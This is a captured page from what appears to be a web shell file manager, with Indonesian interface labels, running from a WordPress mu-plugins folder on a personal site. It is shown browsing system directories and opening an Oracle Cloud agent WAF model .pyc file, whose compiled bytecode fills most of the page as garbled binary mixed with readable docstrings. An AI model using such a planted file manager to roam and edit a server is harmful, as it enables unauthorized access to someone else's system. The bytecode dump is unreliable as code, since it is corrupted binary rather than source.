📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
waf
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/waf/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: web_app_firewall_policy_rule.pyc
a O��f�! � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdd� Ze dd � �Z ed d� �Zej dd� �Zed d� �Zej dd� �Zedd� �Zej dd� �Zedd� �Zej dd� �Zedd� �Zej dd� �Zdd� Zdd� Zdd� ZdS ) �WebAppFirewallPolicyRulez` Base schema for WebAppFirewallPolicyRules, including properties common to all of them. �ACCESS_CONTROL� PROTECTION�REQUEST_RATE_LIMITING�JMESPATHc K sF dddddd�| _ dddddd�| _d| _d| _d| _d| _d| _dS ) a� Initializes a new WebAppFirewallPolicyRule object with values from keyword arguments. This class has the following subclasses and if you are using this class as input to a service operations then you should favor using a subclass over the base class: * :class:`~oci.waf.models.ProtectionRule` * :class:`~oci.waf.models.RequestRateLimitingRule` * :class:`~oci.waf.models.AccessControlRule` The following keyword arguments are supported (corresponding to the getters/setters of this class): :param type: The value to assign to the type property of this WebAppFirewallPolicyRule. Allowed values for this property are: "ACCESS_CONTROL", "PROTECTION", "REQUEST_RATE_LIMITING" :type type: str :param name: The value to assign to the name property of this WebAppFirewallPolicyRule. :type name: str :param condition_language: The value to assign to the condition_language property of this WebAppFirewallPolicyRule. Allowed values for this property are: "JMESPATH" :type condition_language: str :param condition: The value to assign to the condition property of this WebAppFirewallPolicyRule. :type condition: str :param action_name: The value to assign to the action_name property of this WebAppFirewallPolicyRule. :type action_name: str �str)�type�name�condition_language� condition�action_namer r �conditionLanguager � actionNameN)� swagger_types� attribute_map�_type�_name�_condition_language� _condition�_action_name)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/waf/models/web_app_firewall_policy_rule.py�__init__ s"